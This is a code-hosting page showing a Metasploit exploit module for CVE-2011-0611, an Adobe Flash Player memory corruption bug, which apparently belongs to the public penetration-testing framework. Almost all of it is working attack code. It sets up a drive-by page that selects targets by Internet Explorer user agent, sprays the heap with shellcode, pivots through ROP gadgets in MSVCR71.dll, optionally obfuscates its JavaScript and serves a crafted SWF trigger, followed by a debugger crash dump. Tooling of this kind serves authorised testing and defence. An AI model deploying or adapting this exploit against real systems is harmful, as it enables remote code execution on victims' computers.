CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::RopDb

11


12
  def initialize(info={})

13
    super(update_info(info,

14
      'Name'           => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",

15
      'Description'    => %q{

16
          This module exploits a vulnerability in Adobe Flash Player that was discovered,

17
        and has been exploited actively in the wild.  By embedding a specially crafted .swf

18
        file, Adobe Flash crashes due to an invalid use of an object type, which allows

19
        attackers to overwrite a pointer in memory, and results arbitrary code execution.

20
        Please note for IE 8 targets, Java Runtime Environment must be available on the

21
        victim machine in order to work properly.

22
      },

23
      'License'        => MSF_LICENSE,

24
      'Author'         =>

25
        [

26
          'sinn3r',

27
        ],

28
      'References'     =>

29
        [

30
          [ 'CVE', '2011-0611' ],

31
          [ 'OSVDB', '71686' ],

32
          [ 'BID', '47314' ],

33
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],

34
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],

35
          [ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],

36
          [ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],

37
          [ 'URL', 'http://web.archive.org/web/20110417154057/http://secunia.com:80/blog/210/' ],

38
        ],

39
      'Payload'        =>

40
        {

41
          'Space'    => 1024,

42
          'BadChars' => "\x00",

43
        },

44
      'DefaultOptions' =>

45
        {

46
          'EXITFUNC'         => "process",

47
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

48
        },

49
      'Platform'       => 'win',

50
      'Targets'        =>

51
        [

52
          [ 'Automatic', {} ],

53
          [

54
            'IE 6 on Windows XP SP3',

55
            {

56
              'Rop'     => false,

57
              'Pivot'   => nil,         #No ROP no pivot

58
              'Offset1' => '0x01',      #For aligning the payload

59
              'Offset2' => '0x02',      #For aligning the CALL

60
              'Max1'    => '0x150',     #First spray

61
              'Max2'    => '0x200'      #Second spray

62
            }

63
          ],

64
          [

65
            'IE 7 on Windows XP SP3',

66
            {

67
              'Rop'     => false,

68
              'Pivot'   => nil,         #No ROP no pivot

69
              'Offset1' => '0x01',      #For aligning the payload

70
              'Offset2' => '0x02',      #For aligning the CALL

71
              'Max1'    => '0x150',     #First spray

72
              'Max2'    => '0x200'      #Second spray

73
            }

74
          ],

75
          [

76
            'IE 8 on Windows XP SP3',

77
            {

78
              'Rop'     => true,

79
              'Pivot'   => 0x7c348b05,  #XCHG EAX,ESP; RETN (MSVCR71.dll)

80
              'Offset1' => '0x5E2',     #Offset for rop+payload

81
              'Offset2' => '0x02',      #Offset to 0x11111110

82
              'Max1'    => '0x250',     #First spray

83
              'Max2'    => '0x200'      #Second spray

84
            }

85
          ],

86
          [

87
            'IE 7 on Windows Vista',

88
            {

89
              'Rop'     => false,

90
              'Pivot'   => nil,         #No ROP no pivot

91
              'Offset1' => '0x01',      #For aligning the payload

92
              'Offset2' => '0x02',      #For aligning the CALL

93
              'Max1'    => '0x150',     #First spray

94
              'Max2'    => '0x200'      #Second spray

95
            }

96
          ],

97
          [

98
            'IE 8 on Windows 7',

99
            {

100
              'Rop'     => true,

101
              'Pivot'   => 0x7c348b05,  #XCHG EAX,ESP; RETN (MSVCR71.dll)

102
              'Offset1' => '0x5F4',     #Offset for rop+payload

103
              'Offset2' => '0x02',      #Offset to 0x11111110

104
              'Max1'    => '0x101',     #First spray

105
              'Max2'    => '0x300'      #Second spray

106
            }

107
          ]

108
        ],

109
      'Privileged'     => false,

110
      'DisclosureDate' => '2011-04-11',

111
      'DefaultTarget'  => 0))

112


113
    register_options(

114
      [

115
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])

116
      ], self.class

117
    )

118


119
  end

120


121
  def exploit

122
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2011-0611.swf")

123
    f = File.open(path, "rb")

124
    @trigger = f.read(f.stat.size)

125
    f.close

126
    super

127
  end

128


129
  def get_target(request)

130
    agent = request.headers['User-Agent']

131


132
    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/

133
      #Windows XP SP3 + IE 6.0

134
      return targets[1]

135
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/

136
      #Windows XP SP3 + IE 7.0

137
      return targets[2]

138
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/

139
      #Windows XP SP3 + IE 8.0 + JRE6

140
      return targets[3]

141
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/

142
      #Windows Vista + IE 7

143
      return targets[4]

144
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/

145
      #Windows 7 + IE 8 + JRE6

146
      return targets[5]

147
    else

148
      return nil

149
    end

150
  end

151


152
  def on_request_uri(cli, request)

153
    #Set default target

154
    my_target = target

155


156
    #If user chooses automatic target, we choose one based on user agent

157
    if my_target.name =~ /Automatic/

158
      my_target = get_target(request)

159
      if my_target.nil?

160
        print_error("Sending 404 for unknown user-agent")

161
        send_not_found(cli)

162
        return

163
      end

164
      vprint_status("Target selected: #{my_target.name}")

165
    end

166


167
    vprint_status("URL: #{request.uri}")

168


169
    if request.uri =~ /\.swf$/

170
      #Browser requests our trigger file, why not

171
      print_status("Sending trigger SWF...")

172
      send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )

173
      return

174
    end

175


176
    #Targets that don't need ROP

177
    pivot  = "\xb8\x0c\x0c\x0c\x0c"  #MOV EAX,0x0c0c0c0c

178
    pivot << "\xff\xe0"              #JMP EAX

179
    pivot << "\x41"                  #Pad

180


181
    #Targets that need ROP

182
    if my_target['Rop']

183
      #Target Addr=0x11111110

184
      pivot =

185
      [

186
        0x0c0c0c0c,          # Padding. Value for ESP after the XCHG pivot

187
        my_target['Pivot'],  # ROP Pivot

188
        0x7c346b52,          # EAX (POP ESP; RETN)

189
      ].pack('V*')

190


191
      #Target Addr=0x0c0c0c0c

192
      p = generate_rop_payload('java', payload.encoded)

193
    else

194
      p = payload.encoded

195
    end

196


197
    arch = Rex::Arch.endian(my_target.arch)

198


199
    shellcode = Rex::Text.to_unescape(p, arch)

200
    pivot = Rex::Text.to_unescape(pivot, arch)

201


202
    #Extract string based on target

203
    if my_target.name == 'IE 8 on Windows 7'

204
      js_extract_str = "var block = shellcode.substring(0, (0x7ff00-6)/2);"

205
    elsif my_target.name == 'IE 8 on Windows XP SP3'

206
      js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"

207
    else

208
      js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"

209
    end

210


211
    randnop = rand_text_alpha(rand(100) + 1)

212
    js_nops = Rex::Text.to_unescape("\x0c"*4)

213


214
    js = <<-JS

215
    function heap_spray(heaplib, nops, code, offset, max) {

216
      while (nops.length < 0x2000) nops += nops;

217
      var offset = nops.substring(0, offset);

218
      var shellcode = offset + code + nops.substring(0, 0x2000-code.length-offset.length);

219
      while (shellcode.length < 0x40000) shellcode += shellcode;

220
      #{js_extract_str}

221
      heaplib.gc();

222
      for (var i=1; i<max; i++) {

223
        heaplib.alloc(block);

224
      }

225
    }

226


227
    var heap_obj = new heapLib.ie(0x20000);

228
    var #{randnop} = "#{js_nops}";

229
    var nops = unescape(#{randnop});

230
    var code = unescape("#{shellcode}");

231
    heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});

232
    var fake_pointers = unescape("#{pivot}");

233
    heap_spray(heap_obj, fake_pointers, fake_pointers, #{my_target['Offset2']}, #{my_target['Max2']});

234
    JS

235


236
    js = heaplib(js, {:noobfu => true} )

237


238
    #Javascript obfuscation is optional

239
    if datastore['OBFUSCATE']

240
      js = ::Rex::Exploitation::JSObfu.new(js)

241
      js.obfuscate(memory_sensitive: true)

242
    end

243


244
    trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"

245


246
    html = <<-EOS

247
    <html>

248
    <head>

249
    <script>

250
    #{js}

251
    </script>

252
    </head>

253
    <body>

254
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"

255
    codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">

256
    <param name="movie" value="#{trigger_file_name}" />

257
    <embed src="#{trigger_file_name}" quality="high" type="application/x-shockwave-flash"

258
    pluginspage="http://www.macromedia.com/go/getflashplayer">

259
    </embed>

260
    </body>

261
    </html>

262
    EOS

263


264
    html = html.gsub(/^ {4}/, "")

265


266
    print_status("Sending HTML to...")

267
    send_response(cli, html, {'Content-Type' => "text/html"} )

268
  end

269
end

270


271


272
=begin

273
0:000> r

274
eax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0

275
eip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0         nv up ei pl nz na po nc

276
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050202

277
Flash10o+0xd01f6:

278
100d01f6 ff5008          call    dword ptr [eax+8]    ds:0023:11111118=????????

279
0:000> dd ecx

280
01d650b0  11111110 00000000 00000000 00000000

281
01d650c0  00000000 00000000 00000000 00000000

282
01d650d0  00000000 00000000 00000000 00000000

283
01d650e0  00000000 00000000 00000000 00000000

284
01d650f0  00000000 00000000 00000000 00000000

285
01d65100  00000000 00000000 00000000 00000000

286
01d65110  00000000 00000000 00000000 00000000

287
01d65120  00000000 00000000 00000000 00000000

288


289
=end

290


291